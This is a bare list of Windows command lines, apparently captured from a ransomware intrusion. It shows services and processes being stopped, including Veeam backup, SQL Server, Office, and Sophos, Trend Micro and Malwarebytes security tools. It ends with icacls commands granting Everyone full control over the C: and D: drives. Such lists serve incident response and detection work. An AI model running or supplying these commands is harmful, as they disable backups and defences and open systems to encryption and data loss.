"C:\Windows\system32\net1 stop "samss" /y"
"C:\Windows\system32\net1 stop "veeamcatalogsvc" /y"
"C:\Windows\system32\net1 stop "veeamcloudsvc" /y"
"C:\Windows\system32\net1 stop "veeamdeploysvc" /y"
"C:\Windows\System32\net.exe" stop "samss" /y"
"C:\Windows\System32\net.exe" stop "veeamcatalogsvc" /y"
"C:\Windows\System32\net.exe" stop "veeamcloudsvc" /y"
"C:\Windows\System32\net.exe" stop "veeamdeploysvc" /y"
"C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F"
"C:\Windows\System32\taskkill.exe" /IM sqlceip.exe /F"
"C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F"
"C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeam.backup.agent.configurationservice.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeam.backup.brokerservice.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeam.backup.catalogdataservice.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeam.backup.cloudservice.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeam.backup.externalinfrastructure.dbprovider.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeam.backup.manager.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeam.backup.mountservice.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeam.backup.service.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeam.backup.uiserver.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeam.backup.wmiserver.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeamdeploymentsvc.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeamfilesysvsssvc.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeam.guest.interaction.proxy.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeamnfssvc.exe /F"
"C:\Windows\System32\taskkill.exe" /IM veeamtransportsvc.exe /F"
"C:\Windows\System32\taskkill.exe" /IM visio.exe /F"
"C:\Windows\System32\taskkill.exe" /IM winword.exe /F"
"C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F"
"C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F"
"C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F"
"C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F"
"C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F"
"C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F"
"C:\Windows\System32\taskkill.exe" /IM SophosFS.exe /F"
"C:\Windows\System32\taskkill.exe" /IM SophosFileScanner.exe /F"
"C:\Windows\System32\taskkill.exe" /IM SophosFileScanner.exe /F"
"C:\Windows\System32\taskkill.exe" /IM SophosHealth.exe /F"
"C:\Windows\System32\taskkill.exe" /IM Sophos.Encryption.BitLocker.exe /F"
"C:\Windows\System32\taskkill.exe" /IM SophosLiveQueryService.exe /F"
"C:\Windows\System32\taskkill.exe" /IM SophosOsquery.exe /F"
"C:\Windows\system32\taskmgr.exe" /4"
"C:\Windows\system32\wbem\wmiprvse.exe -Embedding"
"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"
"icacls "C:\*" /grant:r Everyone:(OI)(CI)F /T /C /Q"
"icacls "D:\*" /grant:r Everyone:(OI)(CI)F /T /C /Q"
